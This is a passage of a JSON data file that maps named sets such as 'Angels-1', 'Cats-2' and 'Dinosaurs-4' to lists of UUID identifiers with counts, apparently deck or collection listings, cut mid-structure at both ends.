"id": "6a3c7c06-76e4-487d-a63f-4aed3bbb4638",
"count": 7
}
],
"Above the Clouds-2": [
{
"id": "b238485f-ef67-4295-892b-a10235368f74",
"count": 1
},
{
"id": "cce6289e-f665-4faa-8285-c843447f3e52",
"count": 1
},
{
"id": "d961c441-b76b-4bd8-b510-a3e073207a1b",
"count": 1
},
{
"id": "8cbac0e4-f79f-476d-b410-d19ab3696606",
"count": 1
},
{
"id": "30032a0b-dece-42a4-9309-fa9e9e277603",
"count": 1
},
{
"id": "dee1d595-a998-4652-931f-a1a72446f3a6",
"count": 1
},
{
"id": "6ac0f66a-213f-463e-8ebb-35ff5940ea06",
"count": 1
},
{
"id": "393fc485-d3c1-4826-933d-89f66df769d4",
"count": 1
},
{
"id": "64832674-beb1-446e-b2f7-8a5e271139a5",
"count": 1
},
{
"id": "da367981-9d6f-419f-9f58-f969b6183336",
"count": 1
},
{
"id": "2dc0bafd-debc-4b62-9fe0-56b4aad02484",
"count": 1
},
{
"id": "4b153c2f-fc87-49bc-9d1e-d5e7e25b2142",
"count": 1
},
{
"id": "f5ed9f08-56e8-4e24-aae2-05270d7c1ba8",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "6a3c7c06-76e4-487d-a63f-4aed3bbb4638",
"count": 6
}
],
"Above the Clouds-3": [
{
"id": "cce6289e-f665-4faa-8285-c843447f3e52",
"count": 1
},
{
"id": "8cbac0e4-f79f-476d-b410-d19ab3696606",
"count": 1
},
{
"id": "dee1d595-a998-4652-931f-a1a72446f3a6",
"count": 1
},
{
"id": "6ac0f66a-213f-463e-8ebb-35ff5940ea06",
"count": 1
},
{
"id": "8c58807d-1663-486a-ac94-627a8677f2b3",
"count": 1
},
{
"id": "d0346326-6bdf-4385-ab41-7b06e9f66ffd",
"count": 1
},
{
"id": "393fc485-d3c1-4826-933d-89f66df769d4",
"count": 1
},
{
"id": "64832674-beb1-446e-b2f7-8a5e271139a5",
"count": 1
},
{
"id": "da367981-9d6f-419f-9f58-f969b6183336",
"count": 1
},
{
"id": "2dc0bafd-debc-4b62-9fe0-56b4aad02484",
"count": 1
},
{
"id": "f5ed9f08-56e8-4e24-aae2-05270d7c1ba8",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "6a3c7c06-76e4-487d-a63f-4aed3bbb4638",
"count": 8
}
],
"Above the Clouds-4": [
{
"id": "cce6289e-f665-4faa-8285-c843447f3e52",
"count": 1
},
{
"id": "437ded6e-4e53-49fa-a5ca-fd76b9165a47",
"count": 1
},
{
"id": "d961c441-b76b-4bd8-b510-a3e073207a1b",
"count": 1
},
{
"id": "8cbac0e4-f79f-476d-b410-d19ab3696606",
"count": 1
},
{
"id": "dee1d595-a998-4652-931f-a1a72446f3a6",
"count": 1
},
{
"id": "6ac0f66a-213f-463e-8ebb-35ff5940ea06",
"count": 1
},
{
"id": "82ff4bd1-2b61-46be-b547-38916ea08298",
"count": 1
},
{
"id": "64832674-beb1-446e-b2f7-8a5e271139a5",
"count": 1
},
{
"id": "da367981-9d6f-419f-9f58-f969b6183336",
"count": 1
},
{
"id": "b19de7a5-c291-405b-a2e6-8d3ac56e6570",
"count": 1
},
{
"id": "2dc0bafd-debc-4b62-9fe0-56b4aad02484",
"count": 1
},
{
"id": "f5ed9f08-56e8-4e24-aae2-05270d7c1ba8",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "6a3c7c06-76e4-487d-a63f-4aed3bbb4638",
"count": 7
}
],
"Angels-1": [
{
"id": "ddf5db14-f2aa-4088-9894-7bd3a56dfe1e",
"count": 1
},
{
"id": "9c977c67-b0c0-40b0-b129-28de094aaf40",
"count": 1
},
{
"id": "46666fba-d4a7-4687-8747-a42e4c6d853e",
"count": 1
},
{
"id": "0b0974b4-b306-4026-b0a8-22bd9da3e384",
"count": 1
},
{
"id": "9b2a972a-a953-485d-920d-8f4f978ef758",
"count": 1
},
{
"id": "9067f035-3437-4c5c-bae9-d3c9001a3411",
"count": 1
},
{
"id": "30a78066-c52e-48fd-bcf9-d0b60f00fddc",
"count": 1
},
{
"id": "e8cca776-b0e4-4cd2-815f-36c1f86cf497",
"count": 1
},
{
"id": "73148b3b-73d3-4f57-8b67-1e91fbe112b9",
"count": 1
},
{
"id": "f14ed7f7-83c4-425b-a2b7-5bd76558ce76",
"count": 1
},
{
"id": "393ef742-6968-4266-ae07-a4564b7f6ede",
"count": 1
},
{
"id": "2a2d0981-0af6-42d6-b926-16f8f2327320",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "75c3424f-0500-48ce-9779-b77e7763e253",
"count": 7
}
],
"Angels-2": [
{
"id": "8637d263-5d7e-45bc-aad3-d97f57e6898e",
"count": 1
},
{
"id": "ddf5db14-f2aa-4088-9894-7bd3a56dfe1e",
"count": 1
},
{
"id": "9c977c67-b0c0-40b0-b129-28de094aaf40",
"count": 1
},
{
"id": "46666fba-d4a7-4687-8747-a42e4c6d853e",
"count": 1
},
{
"id": "9b2a972a-a953-485d-920d-8f4f978ef758",
"count": 1
},
{
"id": "dded98c3-17cb-4a43-a209-289ceb11df39",
"count": 1
},
{
"id": "9067f035-3437-4c5c-bae9-d3c9001a3411",
"count": 1
},
{
"id": "e8cca776-b0e4-4cd2-815f-36c1f86cf497",
"count": 1
},
{
"id": "457eb507-bbbf-4064-bdb0-cfeefe2195df",
"count": 1
},
{
"id": "f14ed7f7-83c4-425b-a2b7-5bd76558ce76",
"count": 1
},
{
"id": "393ef742-6968-4266-ae07-a4564b7f6ede",
"count": 1
},
{
"id": "2a2d0981-0af6-42d6-b926-16f8f2327320",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "75c3424f-0500-48ce-9779-b77e7763e253",
"count": 7
}
],
"Archaeology-1": [
{
"id": "8d4113be-6dd9-4c15-9f57-a146bc520df8",
"count": 1
},
{
"id": "22bb8779-ac19-43d6-b818-86eb8ee2f87d",
"count": 2
},
{
"id": "40dfe354-d527-4f56-8457-b95884700a40",
"count": 1
},
{
"id": "dcc90cf8-9dd6-4dac-8cbb-21677d81e4d3",
"count": 1
},
{
"id": "b1b959af-bb23-42e7-8848-7405ed597c8d",
"count": 1
},
{
"id": "a9a086bf-19d2-4827-af2c-a6f57d640782",
"count": 1
},
{
"id": "aa254a86-3c30-408d-9c14-befd472f9740",
"count": 1
},
{
"id": "52e40cb2-d306-4c8d-859b-ac288e9dc78d",
"count": 1
},
{
"id": "a54e8ce9-edd7-4ae7-9521-6fb6727cf63b",
"count": 1
},
{
"id": "edabc8b2-4413-48e4-8d6f-521b19d839a6",
"count": 1
},
{
"id": "c5112871-dd07-4257-9a11-a86523c4a8b6",
"count": 1
},
{
"id": "011bc5b7-c4d5-4c4c-af0d-aa0853d63f3a",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "5c7f7338-8edc-4579-b92f-86b02527682c",
"count": 6
}
],
"Archaeology-2": [
{
"id": "8d4113be-6dd9-4c15-9f57-a146bc520df8",
"count": 1
},
{
"id": "22bb8779-ac19-43d6-b818-86eb8ee2f87d",
"count": 2
},
{
"id": "40dfe354-d527-4f56-8457-b95884700a40",
"count": 1
},
{
"id": "dcc90cf8-9dd6-4dac-8cbb-21677d81e4d3",
"count": 1
},
{
"id": "b1b959af-bb23-42e7-8848-7405ed597c8d",
"count": 1
},
{
"id": "a9a086bf-19d2-4827-af2c-a6f57d640782",
"count": 1
},
{
"id": "aa254a86-3c30-408d-9c14-befd472f9740",
"count": 1
},
{
"id": "52e40cb2-d306-4c8d-859b-ac288e9dc78d",
"count": 1
},
{
"id": "a54e8ce9-edd7-4ae7-9521-6fb6727cf63b",
"count": 1
},
{
"id": "58382d72-9b2b-44cf-8a02-b745deafc286",
"count": 1
},
{
"id": "48eda056-e00f-4e28-ad26-9150a4704d21",
"count": 1
},
{
"id": "011bc5b7-c4d5-4c4c-af0d-aa0853d63f3a",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "5c7f7338-8edc-4579-b92f-86b02527682c",
"count": 6
}
],
"Archaeology-3": [
{
"id": "8d4113be-6dd9-4c15-9f57-a146bc520df8",
"count": 1
},
{
"id": "22bb8779-ac19-43d6-b818-86eb8ee2f87d",
"count": 2
},
{
"id": "dcc90cf8-9dd6-4dac-8cbb-21677d81e4d3",
"count": 1
},
{
"id": "b1b959af-bb23-42e7-8848-7405ed597c8d",
"count": 1
},
{
"id": "a9a086bf-19d2-4827-af2c-a6f57d640782",
"count": 1
},
{
"id": "eedce8ab-771a-4247-9504-72ae0629df83",
"count": 1
},
{
"id": "4df1ce35-1f1c-40ab-8e4d-cb087b4656d8",
"count": 1
},
{
"id": "508b3cb7-b434-4524-8ef0-7db7f7f22edd",
"count": 1
},
{
"id": "52e40cb2-d306-4c8d-859b-ac288e9dc78d",
"count": 1
},
{
"id": "a54e8ce9-edd7-4ae7-9521-6fb6727cf63b",
"count": 1
},
{
"id": "c5112871-dd07-4257-9a11-a86523c4a8b6",
"count": 1
},
{
"id": "011bc5b7-c4d5-4c4c-af0d-aa0853d63f3a",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "5c7f7338-8edc-4579-b92f-86b02527682c",
"count": 6
}
],
"Archaeology-4": [
{
"id": "22bb8779-ac19-43d6-b818-86eb8ee2f87d",
"count": 2
},
{
"id": "3d0c95b0-7b63-40e8-92ad-5ae5ffd3c4c1",
"count": 1
},
{
"id": "dcc90cf8-9dd6-4dac-8cbb-21677d81e4d3",
"count": 1
},
{
"id": "b1b959af-bb23-42e7-8848-7405ed597c8d",
"count": 1
},
{
"id": "a9a086bf-19d2-4827-af2c-a6f57d640782",
"count": 1
},
{
"id": "a8c9d86a-54a3-457c-b9b4-61f914de6e14",
"count": 1
},
{
"id": "5fbd8e7c-13cb-4aea-a3cb-c7ed29d43163",
"count": 1
},
{
"id": "e77f544c-1d27-4632-8ca5-7dfb38f42b1c",
"count": 1
},
{
"id": "52e40cb2-d306-4c8d-859b-ac288e9dc78d",
"count": 1
},
{
"id": "a54e8ce9-edd7-4ae7-9521-6fb6727cf63b",
"count": 1
},
{
"id": "973c166e-3e93-4ed5-b4c5-84dc158a8e4f",
"count": 1
},
{
"id": "011bc5b7-c4d5-4c4c-af0d-aa0853d63f3a",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "5c7f7338-8edc-4579-b92f-86b02527682c",
"count": 6
}
],
"Basri": [
{
"id": "08d1dd97-2675-4953-ab95-d47d23abfe05",
"count": 1
},
{
"id": "74b1eae0-1bf8-4922-a9e3-45c01ece9005",
"count": 1
},
{
"id": "600d3517-e370-47ae-ac4f-c7ef8995a89c",
"count": 1
},
{
"id": "2f81d2a0-5301-4cae-ac83-ad51647146e3",
"count": 1
},
{
"id": "7a0ffa89-e6ee-466c-8edc-dd24c8b52e80",
"count": 1
},
{
"id": "db17f25a-32d1-469b-bb5f-f1761e227990",
"count": 1
},
{
"id": "3b43d7bc-173c-41eb-bba9-a9d94dcfc5fa",
"count": 1
},
{
"id": "98c85699-2daf-4e87-a3be-465d02bd64bb",
"count": 1
},
{
"id": "73148b3b-73d3-4f57-8b67-1e91fbe112b9",
"count": 1
},
{
"id": "c2e6fdc0-bdd4-4bba-b8f1-bbc8dfad038e",
"count": 1
},
{
"id": "032f6c5a-8d88-4a55-a54b-28df42d801e1",
"count": 1
},
{
"id": "8e742d49-e6f0-4016-ba4c-11878fad89cb",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "2f6778ff-6c1c-498a-bbfa-46c35b77a72a",
"count": 7
}
],
"Cats-1": [
{
"id": "a3f6a13a-ab38-49d1-8712-f9c9135a23c8",
"count": 1
},
{
"id": "fbea5a3c-03b7-44da-b8f7-534a962b8e1e",
"count": 1
},
{
"id": "a59d92b0-5ad1-42a7-9c06-1cb31a63bd64",
"count": 1
},
{
"id": "380e83c1-e5e3-49b2-bbf3-fad8cc7d020a",
"count": 1
},
{
"id": "3c21c795-e455-4ecf-a7a2-8f204c114c81",
"count": 1
},
{
"id": "73f5156b-b200-41f7-8b93-557c4cdc2bf7",
"count": 1
},
{
"id": "df520254-0c72-496b-9222-263ca9d3c5d5",
"count": 1
},
{
"id": "fe39e38e-76e5-4883-b530-d3e30e88ccad",
"count": 1
},
{
"id": "01398f5f-f38e-45a7-b755-e65c8fa779f8",
"count": 1
},
{
"id": "8b9f4647-4214-4f11-8995-72e149592e2f",
"count": 1
},
{
"id": "77cf9d11-936f-4e02-8595-0cbcabaafb1e",
"count": 1
},
{
"id": "190ad379-1a0f-4598-b5b1-453955846597",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "ea556a69-c487-45ca-8f60-7e89407ec7b7",
"count": 7
}
],
"Cats-2": [
{
"id": "a3f6a13a-ab38-49d1-8712-f9c9135a23c8",
"count": 1
},
{
"id": "fbea5a3c-03b7-44da-b8f7-534a962b8e1e",
"count": 1
},
{
"id": "a59d92b0-5ad1-42a7-9c06-1cb31a63bd64",
"count": 1
},
{
"id": "380e83c1-e5e3-49b2-bbf3-fad8cc7d020a",
"count": 1
},
{
"id": "3c21c795-e455-4ecf-a7a2-8f204c114c81",
"count": 1
},
{
"id": "496cce86-ff61-4d24-8d37-8c27acaff21c",
"count": 1
},
{
"id": "df520254-0c72-496b-9222-263ca9d3c5d5",
"count": 1
},
{
"id": "01398f5f-f38e-45a7-b755-e65c8fa779f8",
"count": 1
},
{
"id": "8b9f4647-4214-4f11-8995-72e149592e2f",
"count": 1
},
{
"id": "77cf9d11-936f-4e02-8595-0cbcabaafb1e",
"count": 1
},
{
"id": "190ad379-1a0f-4598-b5b1-453955846597",
"count": 1
},
{
"id": "9952da7c-3cfc-413f-8849-0f10e9c8dceb",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "ea556a69-c487-45ca-8f60-7e89407ec7b7",
"count": 7
}
],
"Chandra": [
{
"id": "ed875705-b7b6-4464-b16f-61629ffed04f",
"count": 1
},
{
"id": "91d3e366-4da5-42c8-bbd5-a0c178c0da28",
"count": 2
},
{
"id": "e7744fcf-2336-489d-bc05-f3fce78713a9",
"count": 1
},
{
"id": "05469d01-0d2b-47b9-8a69-16cf0c3d43f8",
"count": 1
},
{
"id": "15148b4e-19e2-4e39-8e6f-1dc94ea03463",
"count": 1
},
{
"id": "218af707-cc60-407e-af20-e21879a0e902",
"count": 1
},
{
"id": "a4c3ca8c-c77c-43b8-84ad-796313ecc813",
"count": 1
},
{
"id": "07392a36-e63a-4648-b8df-1172403922eb",
"count": 1
},
{
"id": "f4af156d-0fbf-4a4e-b0c1-db7e95be4903",
"count": 1
},
{
"id": "584cdb52-08f8-425b-8407-8192b1dc6843",
"count": 1
},
{
"id": "ffdb47a8-130b-4ca9-ad29-9484b5c0c582",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "0162885d-3f55-4440-b40d-e38d378c4567",
"count": 7
}
],
"Devilish-1": [
{
"id": "1d4e5c23-3a7f-4a6b-99c4-6a1487a9b097",
"count": 1
},
{
"id": "bd7308e6-4303-4f01-928b-f154b376e1a5",
"count": 1
},
{
"id": "386e5cb2-39c8-453d-a642-c5d9f8495601",
"count": 1
},
{
"id": "4bfffc18-b36a-4dd5-909e-60ea9f8eb60b",
"count": 1
},
{
"id": "fbd306cf-6625-4414-b9e5-4b909bb1bb13",
"count": 1
},
{
"id": "d59ee7a6-3dfa-44c7-8f00-0183137c4d31",
"count": 1
},
{
"id": "60c3aa66-2436-40a3-a541-185f457bd55a",
"count": 1
},
{
"id": "3d94b4c3-7944-41b6-8c92-78fd6e50658d",
"count": 1
},
{
"id": "81232b04-a4a0-48d8-b8af-a6e3d50173e5",
"count": 1
},
{
"id": "9189fafa-f30f-49a1-b07d-e432640d2bc5",
"count": 1
},
{
"id": "af482a14-a144-4e60-bd04-a548a3c89f5a",
"count": 1
},
{
"id": "ab7052f1-9736-47b6-9da3-8c5ca925ab54",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "a92c5c74-d5b5-40bf-be86-39ac5e4c4f1a",
"count": 7
}
],
"Devilish-2": [
{
"id": "1d4e5c23-3a7f-4a6b-99c4-6a1487a9b097",
"count": 1
},
{
"id": "386e5cb2-39c8-453d-a642-c5d9f8495601",
"count": 1
},
{
"id": "4bfffc18-b36a-4dd5-909e-60ea9f8eb60b",
"count": 1
},
{
"id": "fbd306cf-6625-4414-b9e5-4b909bb1bb13",
"count": 1
},
{
"id": "d59ee7a6-3dfa-44c7-8f00-0183137c4d31",
"count": 1
},
{
"id": "2947ad7e-d365-45ff-b107-35819b308f8c",
"count": 1
},
{
"id": "60c3aa66-2436-40a3-a541-185f457bd55a",
"count": 2
},
{
"id": "3d94b4c3-7944-41b6-8c92-78fd6e50658d",
"count": 1
},
{
"id": "81232b04-a4a0-48d8-b8af-a6e3d50173e5",
"count": 1
},
{
"id": "af482a14-a144-4e60-bd04-a548a3c89f5a",
"count": 1
},
{
"id": "ab7052f1-9736-47b6-9da3-8c5ca925ab54",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "a92c5c74-d5b5-40bf-be86-39ac5e4c4f1a",
"count": 7
}
],
"Devilish-3": [
{
"id": "5ea0d236-bfd2-4f47-8592-2669834d01f1",
"count": 1
},
{
"id": "1d4e5c23-3a7f-4a6b-99c4-6a1487a9b097",
"count": 1
},
{
"id": "386e5cb2-39c8-453d-a642-c5d9f8495601",
"count": 1
},
{
"id": "4bfffc18-b36a-4dd5-909e-60ea9f8eb60b",
"count": 1
},
{
"id": "b1b959af-bb23-42e7-8848-7405ed597c8d",
"count": 1
},
{
"id": "fbd306cf-6625-4414-b9e5-4b909bb1bb13",
"count": 1
},
{
"id": "d59ee7a6-3dfa-44c7-8f00-0183137c4d31",
"count": 1
},
{
"id": "60c3aa66-2436-40a3-a541-185f457bd55a",
"count": 1
},
{
"id": "81232b04-a4a0-48d8-b8af-a6e3d50173e5",
"count": 1
},
{
"id": "9189fafa-f30f-49a1-b07d-e432640d2bc5",
"count": 1
},
{
"id": "78fec7e6-5ed9-46dc-93b4-7a054d763403",
"count": 1
},
{
"id": "ab7052f1-9736-47b6-9da3-8c5ca925ab54",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "a92c5c74-d5b5-40bf-be86-39ac5e4c4f1a",
"count": 7
}
],
"Devilish-4": [
{
"id": "1d4e5c23-3a7f-4a6b-99c4-6a1487a9b097",
"count": 1
},
{
"id": "386e5cb2-39c8-453d-a642-c5d9f8495601",
"count": 1
},
{
"id": "7bbfd905-8c71-4389-9174-6e84bcbcf05c",
"count": 1
},
{
"id": "4bfffc18-b36a-4dd5-909e-60ea9f8eb60b",
"count": 1
},
{
"id": "b1b959af-bb23-42e7-8848-7405ed597c8d",
"count": 1
},
{
"id": "fbd306cf-6625-4414-b9e5-4b909bb1bb13",
"count": 1
},
{
"id": "db89172e-0542-4858-9e65-38b1bac8cdeb",
"count": 1
},
{
"id": "d59ee7a6-3dfa-44c7-8f00-0183137c4d31",
"count": 1
},
{
"id": "81232b04-a4a0-48d8-b8af-a6e3d50173e5",
"count": 1
},
{
"id": "78fec7e6-5ed9-46dc-93b4-7a054d763403",
"count": 1
},
{
"id": "ab7052f1-9736-47b6-9da3-8c5ca925ab54",
"count": 1
},
{
"id": "8b94ff00-0821-4743-b693-2ba310466306",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "a92c5c74-d5b5-40bf-be86-39ac5e4c4f1a",
"count": 7
}
],
"Dinosaurs-1": [
{
"id": "8059c52b-5d25-4052-b48a-e9e219a7a546",
"count": 1
},
{
"id": "68f1d2e6-ffa4-4c4e-8179-671deb9f5a7f",
"count": 1
},
{
"id": "288b056a-ea80-4fdc-990d-0ee1e9a7bf64",
"count": 1
},
{
"id": "8c342309-aef7-4733-ac1c-ff0b704539a7",
"count": 1
},
{
"id": "20471a3b-90f9-4463-9b43-fc7b9b28f5d1",
"count": 1
},
{
"id": "c2c4a0e7-9ca4-4291-94de-165cc2ded822",
"count": 1
},
{
"id": "c6cf27a3-9bcf-475c-a324-7c3af50496dd",
"count": 1
},
{
"id": "01398f5f-f38e-45a7-b755-e65c8fa779f8",
"count": 1
},
{
"id": "f66d2ddc-b4d4-4387-bde0-16d81ef2b1a7",
"count": 1
},
{
"id": "31233339-c5ec-40fb-badd-94ef7f0ff7c0",
"count": 1
},
{
"id": "abdf15ef-91e9-433f-a4c8-e670adef904c",
"count": 1
},
{
"id": "1947f64a-5ca0-4dda-8bbd-8472e72ecf18",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "c2b534b1-2d78-4de3-afc8-8bdd6ee6da82",
"count": 7
}
],
"Dinosaurs-2": [
{
"id": "8059c52b-5d25-4052-b48a-e9e219a7a546",
"count": 1
},
{
"id": "68f1d2e6-ffa4-4c4e-8179-671deb9f5a7f",
"count": 1
},
{
"id": "288b056a-ea80-4fdc-990d-0ee1e9a7bf64",
"count": 1
},
{
"id": "8c342309-aef7-4733-ac1c-ff0b704539a7",
"count": 1
},
{
"id": "20471a3b-90f9-4463-9b43-fc7b9b28f5d1",
"count": 1
},
{
"id": "c2c4a0e7-9ca4-4291-94de-165cc2ded822",
"count": 1
},
{
"id": "a2e40ded-6daf-423e-8d74-2c6d448e0853",
"count": 1
},
{
"id": "01398f5f-f38e-45a7-b755-e65c8fa779f8",
"count": 1
},
{
"id": "6da62557-9783-4e6c-9b5f-2b77dbf96909",
"count": 1
},
{
"id": "f66d2ddc-b4d4-4387-bde0-16d81ef2b1a7",
"count": 1
},
{
"id": "31233339-c5ec-40fb-badd-94ef7f0ff7c0",
"count": 1
},
{
"id": "abdf15ef-91e9-433f-a4c8-e670adef904c",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "c2b534b1-2d78-4de3-afc8-8bdd6ee6da82",
"count": 7
}
],
"Dinosaurs-3": [
{
"id": "8059c52b-5d25-4052-b48a-e9e219a7a546",
"count": 1
},
{
"id": "68f1d2e6-ffa4-4c4e-8179-671deb9f5a7f",
"count": 1
},
{
"id": "288b056a-ea80-4fdc-990d-0ee1e9a7bf64",
"count": 1
},
{
"id": "20471a3b-90f9-4463-9b43-fc7b9b28f5d1",
"count": 1
},
{
"id": "c2c4a0e7-9ca4-4291-94de-165cc2ded822",
"count": 1
},
{
"id": "fb87782d-e9c7-440b-bd96-aa043d18e185",
"count": 1
},
{
"id": "a2e40ded-6daf-423e-8d74-2c6d448e0853",
"count": 1
},
{
"id": "01398f5f-f38e-45a7-b755-e65c8fa779f8",
"count": 1
},
{
"id": "f66d2ddc-b4d4-4387-bde0-16d81ef2b1a7",
"count": 1
},
{
"id": "abdf15ef-91e9-433f-a4c8-e670adef904c",
"count": 1
},
{
"id": "71a4860a-8bb6-45c0-b00a-b4a42da33ab9",
"count": 1
},
{
"id": "f7df29a3-c40f-4cd8-a6fe-c1b95085cfed",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "c2b534b1-2d78-4de3-afc8-8bdd6ee6da82",
"count": 7
}
],
"Dinosaurs-4": [
{
"id": "8059c52b-5d25-4052-b48a-e9e219a7a546",
"count": 1
},
{
"id": "68f1d2e6-ffa4-4c4e-8179-671deb9f5a7f",
"count": 1
},
{
"id": "288b056a-ea80-4fdc-990d-0ee1e9a7bf64",
"count": 1
},
{
"id": "20471a3b-90f9-4463-9b43-fc7b9b28f5d1",
"count": 1
},
{
"id": "c2c4a0e7-9ca4-4291-94de-165cc2ded822",
"count": 1
},
{
"id": "18d9a1e7-fe87-40e0-bff9-a1fa84b3b949",
"count": 1
},
{
"id": "c6cf27a3-9bcf-475c-a324-7c3af50496dd",
"count": 1
},
{
"id": "f66d2ddc-b4d4-4387-bde0-16d81ef2b1a7",
"count": 1
},
{
"id": "dffcaab7-674b-4e34-b09d-41414bd0022e",
"count": 1
},
{
"id": "abdf15ef-91e9-433f-a4c8-e670adef904c",
"count": 1
},
{
"id": "71a4860a-8bb6-45c0-b00a-b4a42da33ab9",
"count": 1
},
{
"id": "f7df29a3-c40f-4cd8-a6fe-c1b95085cfed",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "c2b534b1-2d78-4de3-afc8-8bdd6ee6da82",
"count": 7
}
],
"Discarding-1": [
{
"id": "cb457c05-2a60-437a-8138-cfd581b22996",
"count": 1
},
{
"id": "e39498cd-9b44-4563-b0fd-9258a52a85b2",
"count": 1
},
{
"id": "90c4b3bb-90b1-4241-a9ca-fdd7a0e0f0ac",
"count": 1
},
{
"id": "86eb76e0-11ed-4f89-a2f4-04bc67f3c94d",
"count": 1
},
{
"id": "40d3e58e-f989-4169-9e2c-a66a23170dcf",
"count": 1
},
{
"id": "d683abb8-46b4-424e-8a10-325519477419",
"count": 1
},
{
"id": "4063be5b-bfd9-43c5-bc39-09a40bc793bf",
"count": 1
},
{
"id": "32aec0ec-0feb-4276-ab9c-5bb18b5005a0",
"count": 2
},
{
"id": "9aacb3ae-c889-4912-bc2d-2aa0adfd20bd",
"count": 1
},
{
"id": "833a8604-92d5-443b-9bc0-bd91c973ef07",
"count": 1
},
{
"id": "f954e983-397c-4fdc-a6a1-142d03bfec7e",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "9a189653-dc0b-4b04-9544-5314cebf23fd",
"count": 7
}
],
"Discarding-2": [
{
"id": "cb457c05-2a60-437a-8138-cfd581b22996",
"count": 1
},
{
"id": "e39498cd-9b44-4563-b0fd-9258a52a85b2",
"count": 1
},
{
"id": "90c4b3bb-90b1-4241-a9ca-fdd7a0e0f0ac",
"count": 1
},
{
"id": "fa9396f3-a93c-47ee-91da-78af864c86c3",
"count": 1
},
{
"id": "a9843f26-83ed-4517-8ad6-0e288833d140",
"count": 1
},
{
"id": "86eb76e0-11ed-4f89-a2f4-04bc67f3c94d",
"count": 1
},
{
"id": "40d3e58e-f989-4169-9e2c-a66a23170dcf",
"count": 1
},
{
"id": "d683abb8-46b4-424e-8a10-325519477419",
"count": 1
},
{
"id": "32aec0ec-0feb-4276-ab9c-5bb18b5005a0",
"count": 2
},
{
"id": "9aacb3ae-c889-4912-bc2d-2aa0adfd20bd",
"count": 1
},
{
"id": "f954e983-397c-4fdc-a6a1-142d03bfec7e",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "9a189653-dc0b-4b04-9544-5314cebf23fd",
"count": 7
}
],
"Doctor-1": [
{
"id": "9c977c67-b0c0-40b0-b129-28de094aaf40",
"count": 1
},
{
"id": "08d1dd97-2675-4953-ab95-d47d23abfe05",
"count": 1
},
{
"id": "0fc18921-59f5-413f-a221-dc47d31b2ec8",
"count": 1
},
{
"id": "5104d4fe-4c20-4106-b405-a2b35140c942",
"count": 1
},
{
"id": "e321bbb0-1660-4452-a9b7-d41674f7f743",
"count": 1
},
{
"id": "e300294d-0bbd-4d28-b2bd-c5a976de212a",
"count": 1
},
{
"id": "a3bd4bce-8ab0-40b9-aad7-7d57a011bb0b",
"count": 1
},
{
"id": "a90c1ad0-83bd-471c-8d4c-e65bc2abaa18",
"count": 1
},
{
"id": "457eb507-bbbf-4064-bdb0-cfeefe2195df",
"count": 1
},
{
"id": "8e742d49-e6f0-4016-ba4c-11878fad89cb",
"count": 1
},
{
"id": "6ea1ee60-5644-4f78-913d-32c36065957f",
"count": 1
},
{
"id": "d5f80411-0a95-4e0a-b7a8-af23ddf385cc",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "2bcd008d-446e-41ba-a92e-871b9296fead",
"count": 7
}
],
"Doctor-2": [
{
"id": "2d22fdde-5590-4a4c-af2e-09711f4b5ffd",
"count": 1
},
{
"id": "9c977c67-b0c0-40b0-b129-28de094aaf40",
"count": 1
},
{
"id": "08d1dd97-2675-4953-ab95-d47d23abfe05",
"count": 1
},
{
"id": "0fc18921-59f5-413f-a221-dc47d31b2ec8",
"count": 1
},
{
"id": "e300294d-0bbd-4d28-b2bd-c5a976de212a",
"count": 1
},
{
"id": "5cd3287d-e4d8-4670-a2dd-b683055ae4b9",
"count": 1
},
{
"id": "b17da4d0-f9fd-43af-85fc-ede9fa3962bf",
"count": 1
},
{
"id": "a3bd4bce-8ab0-40b9-aad7-7d57a011bb0b",
"count": 1
},
{
"id": "a90c1ad0-83bd-471c-8d4c-e65bc2abaa18",
"count": 1
},
{
"id": "d6467d96-e43a-4b1e-b6ce-578d991077b5",
"count": 1
},
{
"id": "6ea1ee60-5644-4f78-913d-32c36065957f",
"count": 1
},
{
"id": "d5f80411-0a95-4e0a-b7a8-af23ddf385cc",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
